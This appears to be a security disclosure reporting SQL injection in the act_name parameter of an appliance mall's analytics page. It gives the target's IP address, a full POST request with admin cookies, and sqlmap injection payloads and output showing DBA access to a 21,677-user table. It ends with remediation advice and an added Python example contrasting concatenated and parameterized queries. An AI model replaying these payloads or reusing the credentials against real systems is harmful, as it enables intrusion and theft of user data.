A HC (Huicong) website has a SQL injection vulnerability that exposes more than 20 thousand user records.
Continued: WooYun-2016-173045
The operating analysis system of the Huicong Household Appliances City site has a SQL injection vulnerability. The User table holds up to 21677 user records.
Vulnerability URL: http://58.252.73.136:8000/ActivityStatistics.aspx
POST /ActivityStatistics.aspx HTTP/1.1
Host: 58.252.73.136:8000
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://58.252.73.136:8000/ActivityStatistics.aspx
Cookie: iconSize=16x16; _pk_id.9.1549=c5212d09a738e870.1453532641.2.1453863564.1453863325.; ECS[visit_times]=6; Hm_lvt_f8b4f3f9251c122a04fe1c11caba248c=1453532839,1453628139,1453703226,1453863154; ECS[display]=grid; _pk_id.5.1549=a8a501c4964f2499.1453532858.1.1453532858.1453532858.; Hm_lvt_fd16bacbe2d90b129666bbde3ee2b5c6=1453532858; DTRememberName=test; ECS_ID=929fee0bac53c1d567ab0cde7cda9af2da4aeae9; Hm_lpvt_f8b4f3f9251c122a04fe1c11caba248c=1453863181; AdminName=MxWeiXinPF=test; AdminPwd=MxWeiXinPF=2CF8FE5DCB0BC697; ASP.NET_SessionId=vpyihj1zxbl0srl2icrcws51; nowweixinId=MxWeiXinPF=29; _pk_ses.9.1549=*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4192

__VIEWSTATE=[base64 ViewState blob omitted]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBQLQ%2B7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1
The injection point is the act_name POST parameter, and the database user is a DBA. sqlmap output:
Parameter: act_name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=[base64 ViewState blob omitted]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND 3304=3304 AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: __VIEWSTATE=[base64 ViewState blob omitted]&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND (SELECT 5121 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(5121=5121,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0
current user: 'jdmall_test@%'
current database: 'jdmall_test'
current user is DBA: True
1. The database configuration file can be read to obtain the password, after which the database can be dumped (not pursued further here).
2. A user table exists in the database (up to 21677 users).
Solution:
1. Filter the user input.
2. The analysis system's back end should not be directly reachable by external users; at a minimum, require authentication for the back end, or block external access altogether.
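As an added illustration of the fix (not code from the report or from the affected system; the real stack is ASP.NET with MySQL, stood in for here by Python's built-in sqlite3 and a constructed activities table), the concatenated LIKE query sits beside a parameterized one, both run with the boolean-based payload sqlmap reported above:

```python
import sqlite3

# Constructed sample rows standing in for the site's activity data (not the real schema).
ROWS = [("2015 promotion 1", "item A"), ("winter sale", "item B"), ("event 10", "item C")]

# The boolean-based payload sqlmap reported for act_name, verbatim from the report.
PAYLOAD = "1%' AND 3304=3304 AND '%'='"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE activities (act_name TEXT, goods_name TEXT)")
    conn.executemany("INSERT INTO activities VALUES (?, ?)", ROWS)
    return conn


def search_vulnerable(conn, act_name):
    """Splices act_name into the SQL text, so quotes and AND clauses in it become SQL."""
    sql = "SELECT act_name FROM activities WHERE act_name LIKE '%" + act_name + "%'"
    return [r[0] for r in conn.execute(sql)]


def search_parameterized(conn, act_name):
    """Binds the whole pattern as a parameter; act_name is data and is never parsed as SQL.
    LIKE metacharacters are escaped too, so a user-supplied '%' or '_' matches literally."""
    escaped = act_name.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT act_name FROM activities WHERE act_name LIKE ? ESCAPE '\\'"
    return [r[0] for r in conn.execute(sql, ("%" + escaped + "%",))]


def demo():
    """Returns (benign search, payload via concatenation, payload via bound parameter)."""
    conn = make_db()
    benign = search_vulnerable(conn, "1")
    # Concatenation yields: ... LIKE '%1%' AND 3304=3304 AND '%'='%'  (injected logic runs)
    injected = search_vulnerable(conn, PAYLOAD)
    # Binding yields a literal pattern containing the quotes and AND; nothing matches.
    safe = search_parameterized(conn, PAYLOAD)
    return benign, injected, safe


if __name__ == "__main__":
    benign, injected, safe = demo()
    print("benign '1' via concatenation:", benign)
    print("payload via concatenation:", injected)
    print("payload via bound parameter:", safe)
```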